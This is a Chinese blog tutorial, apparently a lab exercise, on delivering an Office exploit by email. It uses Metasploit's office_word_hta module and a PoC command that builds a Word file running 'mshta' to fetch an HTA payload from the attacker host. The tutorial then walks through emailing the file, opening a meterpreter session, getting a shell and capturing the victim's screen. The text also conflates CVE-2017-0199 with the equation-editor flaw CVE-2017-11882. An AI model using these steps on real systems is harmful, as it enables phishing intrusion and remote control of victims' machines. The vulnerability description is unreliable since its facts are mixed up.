利用office远程代码执行漏洞进行恶意邮件传播攻击

一、CVE-2017-0199漏洞概述

目前,利用该漏洞可以通杀office 2003至office 2016所有版本,影响office版本有:

  • office 2003 
  • office 2007 
  • office 2010 
  • office 2013 
  • office 2016
  1. 该漏洞产生原因是:由于Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
  2. 用途:利用这个漏洞,可以构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被攻击者直接控制。

二、实验过程

  1. 实验环境  (所有安装环境分享在我的网盘中链接:https://pan.baidu.com/s/1bUWiAyAMSaUfzIhdEgYEOw     提取码:a45i )
  2. 渗透机:Kali Linux + PoC测试代码(可在网盘中找到)
  3. 靶机:win7 + office 2016

一些概念:

  1. CVE:漏洞信息库
  2. PoC:漏洞测试代码。(全称: Proof of Concept), 又叫概念验证。作为我们的漏洞验证程序,他可能是一段不完整的程序,仅仅是为了证明我们提出漏洞的观点。使用编写好的 PoC 去验证测试目标是否存在着漏洞。常用python编写。
  3. HTA是HTML应用程序(HTML Application)的缩写,使用PoC代码将URL插入到hta文件并生成doc文件。

实验过程:

  1. 进入metasploit框架

   2.搜索需要的攻击模块并使用

    3.选择使用模块exploit/windows/fileformat/office_word_hta

     渗透模块可以在目录/usr/share/metasploit-framework/modules/exploits/中找到

4. 设置SRVHOST为攻击主机的IP,接着使用exploit命令进行渗透,开始监听。

5. 使用PoC生成带命令的doc文件

python Command109b_CVE-2017-11882.py -c "mshta http://192.168.57.128:8080/default.hta" -o test.doc

6.将生成的test.doc压缩后通过邮件发送给win 7系统的用户,被害者接收了邮件并打开。

7.在win7 系统用户打开该Word文件后,可在渗透机观察到已经监听到了一个session。

查看session, 进入会话。

8. 进入会话后,用metepreter对会话进行管理,可使用help命令查看metepreter的常用命令。

例如,可用shell命令进入到靶机的系统。

9.若出现乱码,可以输入命令chcp 65001解决

10.进入到靶机系统中后,我们可对靶机的文件进行增删改查等操作,此时靶机已被控制。

还可以查看靶机的系统信息等

还可以截取靶机的屏幕进行查看

此时可以观察到靶机用户正在浏览的屏幕信息。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值